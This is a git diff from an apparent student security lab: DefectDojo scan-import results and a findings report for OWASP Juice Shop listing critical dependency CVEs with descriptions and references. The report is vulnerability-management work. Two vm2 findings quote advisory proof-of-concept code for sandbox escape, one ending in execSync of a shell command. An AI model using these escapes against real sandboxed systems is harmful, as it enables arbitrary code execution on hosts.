diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md new file mode 100644 index 00000000..b65a6540 --- /dev/null +++ b/.github/pull_request_template.md @@ -0,0 +1,9 @@ +# Goal +Submitting my homework for lab# + +# Changes +- Added submissionXX.md + +# Checklist +- [x] Task 1 done +- [x] Task 2 done \ No newline at end of file diff --git a/labs/assets/imported.png b/labs/assets/imported.png new file mode 100644 index 00000000..ce9b46eb Binary files /dev/null and b/labs/assets/imported.png differ diff --git a/labs/lab10/imports/import-semgrep-results.json.json b/labs/lab10/imports/import-semgrep-results.json.json new file mode 100644 index 00000000..8cf08366 --- /dev/null +++ b/labs/lab10/imports/import-semgrep-results.json.json @@ -0,0 +1 @@ +{"minimum_severity":"Info","active":false,"verified":false,"endpoint_to_add":null,"product_type_name":"Engineering","product_name":"Juice Shop","engagement_name":"Labs Security Testing","auto_create_context":true,"deduplication_on_engagement":false,"lead":null,"push_to_jira":false,"api_scan_configuration":null,"create_finding_groups_for_all_findings":true,"test_id":2,"engagement_id":1,"product_id":1,"product_type_id":2,"statistics":{"after":{"info":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"low":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"medium":{"active":18,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":18},"high":{"active":8,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":8},"critical":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"total":{"active":26,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":26}}},"pro":["Did you know, Pro has an automated no-code connector for Semgrep JSON Report? Try today for free or email us at hello@defectdojo.com"],"apply_tags_to_findings":false,"apply_tags_to_endpoints":false,"scan_type":"Semgrep JSON Report","close_old_findings":false,"close_old_findings_product_scope":false,"test":2} \ No newline at end of file diff --git a/labs/lab10/imports/import-trivy-vuln-detailed.json.json b/labs/lab10/imports/import-trivy-vuln-detailed.json.json new file mode 100644 index 00000000..d0d1d3f0 --- /dev/null +++ b/labs/lab10/imports/import-trivy-vuln-detailed.json.json @@ -0,0 +1 @@ +{"minimum_severity":"Info","active":false,"verified":false,"endpoint_to_add":null,"product_type_name":"Engineering","product_name":"Juice Shop","engagement_name":"Labs Security Testing","auto_create_context":true,"deduplication_on_engagement":false,"lead":null,"push_to_jira":false,"api_scan_configuration":null,"create_finding_groups_for_all_findings":true,"test_id":3,"engagement_id":1,"product_id":1,"product_type_id":2,"statistics":{"after":{"info":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"low":{"active":21,"verified":21,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":21},"medium":{"active":69,"verified":67,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":69},"high":{"active":107,"verified":105,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":107},"critical":{"active":22,"verified":22,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":22},"total":{"active":219,"verified":215,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":219}}},"apply_tags_to_findings":false,"apply_tags_to_endpoints":false,"scan_type":"Trivy Scan","close_old_findings":false,"close_old_findings_product_scope":false,"test":3} \ No newline at end of file diff --git a/labs/lab10/imports/import-zap-report-noauth.json.json b/labs/lab10/imports/import-zap-report-noauth.json.json new file mode 100644 index 00000000..207345f6 --- /dev/null +++ b/labs/lab10/imports/import-zap-report-noauth.json.json @@ -0,0 +1 @@ +{"message":"['Internal error: Wrong file format, please use xml.']","pro":["Pro comes with support. Try today for free or email us at hello@defectdojo.com"]} \ No newline at end of file diff --git a/labs/lab10/imports/run-imports.sh b/labs/lab10/imports/run-imports.sh old mode 100644 new mode 100755 diff --git a/labs/lab10/report/dojo-report.html b/labs/lab10/report/dojo-report.html new file mode 100644 index 00000000..4d0c20fa --- /dev/null +++ b/labs/lab10/report/dojo-report.html @@ -0,0 +1,44916 @@ + + + + + Finding Report + + + + + + + + + + + +
+ + + +
+
+ +

Findings

+ + + +

Critical

+ +
+
+
+
+ Finding 126: GHSA-5mrr-rgp6-x4gr Marsdb 0.6.11 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
marsdb0.6.11
+ + + + + + + +
File Path
juice-shop/node_modules/marsdb/package.json
+
+
+
+ + + + + +
Description
+

Command Injection in marsdb
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

All versions of marsdb are vulnerable to Command Injection. In the DocumentMatcher class, selectors on $where + clauses are passed to a Function constructor unsanitized. This allows +attackers to run arbitrary commands in the system when the function is +executed.

+

Recommendation

+

No fix is currently available. Consider using an alternative package until a fix is made available.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://github.com/bkimminich/juice-shop/issues/1173
+https://www.npmjs.com/advisories/1122

+ + + + + + + +
+
+
+
+ Finding 117: CVE-2019-10744 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

+ + +
Description
+

nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.17.12

+

Versions of lodash lower than 4.17.12 are vulnerable to Prototype +Pollution. The function defaultsDeep could be tricked into adding or +modifying properties of Object.prototype using a constructor payload.

+ + +
Mitigation
+

4.17.12

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2019:3024
+https://access.redhat.com/security/cve/CVE-2019-10744
+https://github.com/advisories/GHSA-jf85-cpcp-j695
+https://github.com/lodash/lodash/pull/4336
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml
+https://nvd.nist.gov/vuln/detail/CVE-2019-10744
+https://security.netapp.com/advisory/ntap-20191004-0005
+https://security.netapp.com/advisory/ntap-20191004-0005/
+https://snyk.io/vuln/SNYK-JS-LODASH-450202
+https://support.f5.com/csp/article/K47105354
+https://support.f5.com/csp/article/K47105354?utm_source=f5support&amp%3Butm_medium=RSS
+https://support.f5.com/csp/article/K47105354?utm_source=f5support&utm_medium=RSS
+https://www.cve.org/CVERecord?id=CVE-2019-10744
+https://www.npmjs.com/advisories/1065
+https://www.oracle.com/security-alerts/cpujan2021.html
+https://www.oracle.com/security-alerts/cpuoct2020.html

+ + + + + + + +
+
+
+
+ Finding 110: CVE-2015-9235 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

nodejs-jsonwebtoken: verification step bypass with an altered token
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.2

+

In jsonwebtoken node module before 4.2.2 it is possible for an +attacker to bypass verification when a token digitally signed with an +asymmetric key (RS/ES family) of algorithms but instead the attacker +send a token digitally signed with a symmetric algorithm (HS* family).

+ + +
Mitigation
+

4.2.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2015-9235
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/advisories/GHSA-c7hr-j4mj-j2w6
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://nodesecurity.io/advisories/17
+https://nvd.nist.gov/vuln/detail/CVE-2015-9235
+https://www.cve.org/CVERecord?id=CVE-2015-9235
+https://www.npmjs.com/advisories/17
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 105: CVE-2015-9235 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

nodejs-jsonwebtoken: verification step bypass with an altered token
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.2

+

In jsonwebtoken node module before 4.2.2 it is possible for an +attacker to bypass verification when a token digitally signed with an +asymmetric key (RS/ES family) of algorithms but instead the attacker +send a token digitally signed with a symmetric algorithm (HS* family).

+ + +
Mitigation
+

4.2.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2015-9235
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/advisories/GHSA-c7hr-j4mj-j2w6
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://nodesecurity.io/advisories/17
+https://nvd.nist.gov/vuln/detail/CVE-2015-9235
+https://www.cve.org/CVERecord?id=CVE-2015-9235
+https://www.npmjs.com/advisories/17
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 93: CVE-2026-33937 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

handlebars.js: Handlebars: Remote Code Execution via crafted Abstract Syntax Tree object in compile()
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, Handlebars.compile() accepts a pre-parsed AST object in addition to a template string. The value field of a NumberLiteral + AST node is emitted directly into the generated JavaScript without +quoting or sanitization. An attacker who can supply a crafted AST to compile() + can therefore inject and execute arbitrary JavaScript, leading to +Remote Code Execution on the server. Version 4.7.9 fixes the issue. Some + workarounds are available. Validate input type before calling Handlebars.compile(); ensure the argument is always a string, never a plain object or JSON-deserialized value. Use the Handlebars runtime-only build (handlebars/runtime) on the server if templates are pre-compiled at build time; compile() will be unavailable.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33937
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q
+https://nvd.nist.gov/vuln/detail/CVE-2026-33937
+https://www.cve.org/CVERecord?id=CVE-2026-33937

+ + + + + + + +
+
+
+
+ Finding 230: CVE-2026-44006 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

+ + +
Description
+

vm2 has a Sandbox Escape Vulnerability
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes

+

Details

+

https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658

+

BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)

+

PoC

+
let obj = {
+    subarray: Buffer.prototype.inspect,
+    slice: Buffer.prototype.slice,
+    hexSlice: () => '',
+};
+
+let sym;
+
+obj.slice(10, {
+    showHidden: true,
+    showProxy: true,
+    depth: 10,
+    stylize(a) {
+        const handler = this.seen && this.seen[1];
+
+        if (handler && handler.getPrototypeOf) {
+            gP = handler.getPrototypeOf;
+            HObjectProto = gP(gP(gP(gP(Buffer))));
+            HObject = HObjectProto.constructor;
+            sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
+        }
+        return a;
+    },
+});
+
+obj = {
+    [sym]: (depth, opt, inspect) => {
+        inspect.constructor('return process')()
+        .getBuiltinModule('child_process')
+        .execSync('id', { stdio: 'inherit' });
+    },
+    valueOf: undefined,
+    constructor: undefined,
+};
+
+WebAssembly.compileStreaming(obj).catch(() => {});
+
+ +

Impact

+

Sandbox Escape -> RCE

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8

+ + + + + + + +
+
+
+
+ Finding 229: CVE-2026-44005 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

+ + +
Description
+

vm2: Mutable Proxies for Host Intrinsic Prototypes Allows Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

vm2's bridge exposes mutable proxies for real host-realm intrinsic +prototypes and then forwards sandbox writes into the underlying host +objects with otherReflectSet() and otherReflectDefineProperty(), which +lets attacker-controlled JavaScript running in a default VM or inherited + NodeVM mutate shared host Object.prototype, Array.prototype, and +Function.prototype from inside the sandbox.

+

Details

+

BaseHandler.apply() unwraps sandbox-controlled receivers and +arguments with otherFromThis() / otherFromThisArguments() and then +directly invokes the real host function with ret = +otherReflectApply(object, context, args), so any default-exposed host +function that can surface a prototype getter becomes a prototype-walking + primitive (lib/bridge.js:665-676). BaseHandler.get() special-cases proto and returns the host-side descriptor or proxy target prototype, which is enough for the attacker to reuse the host lookupGetter('proto') accessor repeatedly until the walk lands on host Object.prototype, Array.prototype, or Function.prototype (lib/bridge.js:590-616). + Once the attacker has a proxy to a host intrinsic prototype, +BaseHandler.set() performs value = otherFromThis(value); return +otherReflectSet(object, key, value) === true;, which writes +attacker-controlled data directly into the shared host object instead of + keeping the mutation sandbox-local; BaseHandler.defineProperty() +repeats the same design at otherReflectDefineProperty(object, prop, +otherDesc) for descriptor-based writes (lib/bridge.js:641-649, lib/bridge.js:753-774). + Existing validation does not stop the attack because the constructor +filter only blocks one dangerous-property access pattern, +setPrototypeOf() only blocks prototype replacement rather than ordinary +property assignment, and containsDangerousConstructor() only protects +one later re-unwrapping path instead of the initial host-prototype write + sink (lib/bridge.js:494-530, lib/bridge.js:595-610, lib/bridge.js:660-662).

+

PoC

+

Run the following code snippet and observe that the value of vm2EscapeMarker is polluted:

+
const { VM } = require('vm2');
+const vm = new VM();
+vm.run(`
+  const g = ({}).__lookupGetter__;
+  const a = Buffer.apply;
+  const p = a.apply(g, [Buffer, ['__proto__']]);
+  const hostObjectProto = p.call(p.call(p.call(p.call(Buffer.of()))));
+  hostObjectProto.vm2EscapeMarker = 'polluted-object-prototype';
+`);
+console.log({}.vm2EscapeMarker)
+
+ +

Impact

+

Sandbox escape and prototype pollution.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq

+ + + + + + + +
+
+
+
+ Finding 85: CVE-2023-46233 Crypto-Js 3.3.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 328 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
crypto-js3.3.0
+ + + + + + + +
File Path
juice-shop/node_modules/crypto-js/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

crypto-js: PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.0

+

crypto-js is a JavaScript library of crypto standards. Prior to +version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally +specified in 1993, and at least 1,300,000 times weaker than current +industry standard. This is because it both defaults to SHA1, a +cryptographic hash algorithm considered insecure since at least 2005, +and defaults to one single iteration, a 'strength' or 'difficulty' value + specified at 1,000 when specified in 1993. PBKDF2 relies on iteration +count as a countermeasure to preimage and collision attacks. If used to +protect passwords, the impact is high. If used to generate signatures, +the impact is high. Version 4.2.0 contains a patch for this issue. As a +workaround, configure crypto-js to use SHA256 with at least 250,000 +iterations.

+ + +
Mitigation
+

4.2.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-46233
+https://github.com/brix/crypto-js
+https://github.com/brix/crypto-js/commit/421dd538b2d34e7c24a5b72cc64dc2b9167db40a
+https://github.com/brix/crypto-js/security/advisories/GHSA-xwcq-pm8m-c4vf
+https://lists.debian.org/debian-lts-announce/2023/11/msg00025.html
+https://nvd.nist.gov/vuln/detail/CVE-2023-46233
+https://ubuntu.com/security/notices/USN-6753-1
+https://www.cve.org/CVERecord?id=CVE-2023-46233

+ + + + + + + +
+
+
+
+ Finding 50: CVE-2026-31789 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

openssl: OpenSSL: Heap buffer overflow on 32-bit systems from large X.509 certificate processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: Converting an excessively large OCTET STRING value to
+a hexadecimal string leads to a heap buffer overflow on 32 bit platforms.

+

Impact summary: A heap buffer overflow may lead to a crash or possibly
+an attacker controlled code execution or other undefined behavior.

+

If an attacker can supply a crafted X.509 certificate with an excessively
+large OCTET STRING value in extensions such as the Subject Key Identifier
+(SKID) or Authority Key Identifier (AKID) which are being converted to hex,
+the size of the buffer needed for the result is calculated as multiplication
+of the input length by 3. On 32 bit platforms, this multiplication may overflow
+resulting in the allocation of a smaller buffer and a heap buffer overflow.

+

Applications and services that print or log contents of untrusted X.509
+certificates are vulnerable to this issue. As the certificates would have
+to have sizes of over 1 Gigabyte, printing or logging such certificates
+is a fairly unlikely operation and only 32 bit platforms are affected,
+this issue was assigned Low severity.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31789
+https://github.com/advisories/GHSA-j79m-9jxq-788r
+https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde
+https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf
+https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49
+https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9
+https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521
+https://nvd.nist.gov/vuln/detail/CVE-2026-31789
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://www.cve.org/CVERecord?id=CVE-2026-31789
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 49: CVE-2025-15467 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

openssl: OpenSSL: Remote code execution or Denial of Service via oversized Initialization Vector in CMS parsing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Parsing CMS AuthEnvelopedData or EnvelopedData message with
+maliciously crafted AEAD parameters can trigger a stack buffer overflow.

+

Impact summary: A stack buffer overflow may lead to a crash, causing Denial
+of Service, or potentially remote code execution.

+

When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as
+AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is
+copied into a fixed-size stack buffer without verifying that its length fits
+the destination. An attacker can supply a crafted CMS message with an
+oversized IV, causing a stack-based out-of-bounds write before any
+authentication or tag verification occurs.

+

Applications and services that parse untrusted CMS or PKCS#7 content using
+AEAD ciphers (e.g., S/MIME (Auth)EnvelopedData with AES-GCM) are vulnerable.
+Because the overflow occurs prior to authentication, no valid key material
+is required to trigger it. While exploitability to remote code execution
+depends on platform and toolchain mitigations, the stack-based write
+primitive represents a severe risk.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the CMS implementation is outside the OpenSSL FIPS module
+boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3 and 3.0 are vulnerable to this issue.

+

OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/27/10
+http://www.openwall.com/lists/oss-security/2026/02/25/6
+https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-15467
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-wvhq-3h88-rf6g
+https://github.com/guiimoraes/CVE-2025-15467
+https://github.com/openssl/openssl/commit/2c8f0e5fa9b6ee5508a0349e4572ddb74db5a703
+https://github.com/openssl/openssl/commit/5f26d4202f5b89664c5c3f3c62086276026ba9a9
+https://github.com/openssl/openssl/commit/6ced0fe6b10faa560e410e3ee8d6c82f06c65ea3
+https://github.com/openssl/openssl/commit/ce39170276daec87f55c39dad1f629b56344429e
+https://github.com/openssl/openssl/commit/d0071a0799f20cc8101730145349ed4487c268dc
+https://linux.oracle.com/cve/CVE-2025-15467.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-15467
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://www.cve.org/CVERecord?id=CVE-2025-15467

+ + + + + + + +
+
+
+
+ Finding 228: CVE-2026-43997 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
